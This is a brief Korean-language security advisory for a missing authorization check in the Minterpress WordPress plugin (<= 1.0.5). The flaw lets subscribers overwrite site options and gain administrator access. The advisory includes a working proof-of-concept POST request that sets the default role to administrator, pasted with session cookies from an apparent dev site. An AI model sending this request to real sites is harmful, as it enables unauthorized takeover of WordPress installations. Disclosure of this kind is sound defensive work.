
Minterpress <= 1.0.5 - 인증된(Subscriber+) 사용자의 임의 옵션 업데이트를 허용하는 인가 누락
Minterpress <= 1.0.5 - 인증된(구독자 이상) 사용자에 대한 누락된 권한 확인으로 인한 임의 옵션 업데이트
WordPress용 Minterpress 플러그인은 1.0.5 이하의 모든 버전에서 함수에 대한 권한 확인(capability check) 누락으로 인해 데이터의 무단 수정에 취약하며, 이로 인해 권한 상승이 발생할 수 있습니다. 이 취약점으로 인해 구독자(Subscriber) 이상의 접근 권한을 가진 인증된 공격자가 WordPress 사이트의 임의 옵션을 업데이트할 수 있습니다. 이를 악용하면 기본 가입 역할을 관리자(administrator)로 변경하고 사용자 가입을 활성화하여 공격자가 취약한 사이트에 대한 관리자 사용자 접근 권한을 얻을 수 있습니다.
쿠키를 로그인한 사용자의 쿠키로 변경하세요.
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Cookie: wordpress_sec_738b26438442006baf5dc1367e0c0fd7=superadmin%7C1734790221%7CenzNuyQN6cnP5g8Bmw6ZVil29WJCzcIc1bx3Z10l32r%7C31038bfa66d0777c50fba66263f613d288a20d1e14dfc0fc06903f77d1c9e41f; popup_time=2; alwaysStrip=1; _ga=GA1.2.1953252658.1732269795; _ga_16PD6PV48S=GS1.2.1732269795.1.0.1732270283.0.0.0; wp-settings-time-1=1734520301; wp-settings-1=libraryContent%3Dbrowse; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_738b26438442006baf5dc1367e0c0fd7=superadmin%7C1734790221%7CenzNuyQN6cnP5g8Bmw6ZVil29WJCzcIc1bx3Z10l32r%7C987ff9134b881efe3cced2fa12593fd0ba5b2b02613fb93f48433b112015551a; PHPSESSID=49f0a4bfb294cad31ed4a83ede9bf485; tk_ai=zv7IX5yQT%2F6RzXuKQwqmMvEV; th_shop_mania_thms_time=1735227350366; tk_qs=
action=update_options&options={"default_role":"administrator","users_can_register":"1"}